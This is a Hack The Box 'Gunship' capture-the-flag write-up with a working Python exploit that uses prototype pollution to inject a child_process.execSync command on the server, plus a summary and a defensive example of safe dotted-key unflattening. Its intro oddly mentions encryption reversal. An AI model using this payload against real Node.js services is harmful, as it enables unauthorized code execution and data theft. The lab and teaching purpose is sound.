HackTheBox Gunship Writeup
Explore the basics of cybersecurity in the Gunship Challenge on Hack The Box. This very-easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
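import sys

import requests


def get_base_url():
    # Expect a single argument of the form <ip:port>
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    host, port = sys.argv[1].split(':')
    # No trailing slash: the request paths below already start with '/'
    return f"http://{host}:{port}"


TARGET_URL = get_base_url()

# The "__proto__.block" key triggers the prototype pollution; its "line"
# string is the JavaScript injected into the server's execution flow.
r = requests.post(TARGET_URL + '/api/submit', json={
    "artist.name": "Gingell",
    "__proto__.block": {
        "type": "Text",
        "line":
            "console.log(process.mainModule.require('child_process').execSync('cat flag* > /app/static/out').toString())"
    }
})
print(r.status_code)
print(r.text)

# The command wrote its output under the static directory; fetch it.
print(requests.get(TARGET_URL + '/static/out').text)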
Summary
Gunship is a very-easy-level challenge on Hack The Box that is solved by exploiting prototype pollution to achieve remote code execution (RCE). A crafted payload submitted to the /api/submit endpoint injects JavaScript into the server's execution flow, allowing arbitrary commands to run.
The payload uses child_process.execSync to read the flag file and write it to a publicly accessible location (/app/static/out). The flag is then retrieved through a simple GET request to the exposed file. This challenge highlights the dangers of prototype pollution and improper handling of untrusted input in server-side applications.
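The root cause named in the summary, shown from the defender's side as an added example (not the challenge's source code): a hypothetical `naiveUnflatten` that expands dotted keys such as `"__proto__.block"` without any key checks, beside a hardened `safeUnflatten` that rejects prototype-reaching paths. The function names, the assumption that the server expands dotted keys this way, and the harmless `MARKER` value are all constructed for illustration.

```javascript
// Added example: hypothetical helpers, not the challenge's source code.

// Vulnerable: expands dotted keys ("a.b" -> {a: {b: ...}}) with no key checks.
// Walking through "__proto__" lands on Object.prototype.
function naiveUnflatten(flat) {
  const out = {};
  for (const [path, value] of Object.entries(flat)) {
    const keys = path.split('.');
    let node = out;
    for (const key of keys.slice(0, -1)) {
      if (typeof node[key] !== 'object' || node[key] === null) node[key] = {};
      node = node[key];
    }
    node[keys[keys.length - 1]] = value;
  }
  return out;
}

// Hardened: reject prototype-reaching segments, build on null-prototype objects.
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);
function safeUnflatten(flat) {
  const out = Object.create(null);
  for (const [path, value] of Object.entries(flat)) {
    const keys = path.split('.');
    if (keys.some((k) => FORBIDDEN.has(k))) throw new TypeError(`rejected key path: ${path}`);
    let node = out;
    for (const key of keys.slice(0, -1)) {
      if (typeof node[key] !== 'object' || node[key] === null) node[key] = Object.create(null);
      node = node[key];
    }
    node[keys[keys.length - 1]] = value;
  }
  return out;
}

function demo() {
  // Constructed body shaped like the request above; "MARKER" is a harmless stand-in value.
  const body = JSON.parse('{"artist.name":"Gingell","__proto__.block":{"type":"Text","line":"MARKER"}}');
  const result = {};
  naiveUnflatten(body);
  result.pollutedAfterNaive = ({}).block !== undefined; // every object now inherits .block
  delete Object.prototype.block;                         // undo the pollution
  try { safeUnflatten(body); result.safeRejected = false; } catch (e) { result.safeRejected = e instanceof TypeError; }
  result.pollutedAfterSafe = ({}).block !== undefined;
  result.benign = safeUnflatten({ 'artist.name': 'Gingell' }).artist.name;
  return result;
}
console.log(demo());
```

Rejecting the request outright, rather than silently dropping the key, also leaves a clear signal in application logs that a body contained a `__proto__`, `constructor` or `prototype` path segment.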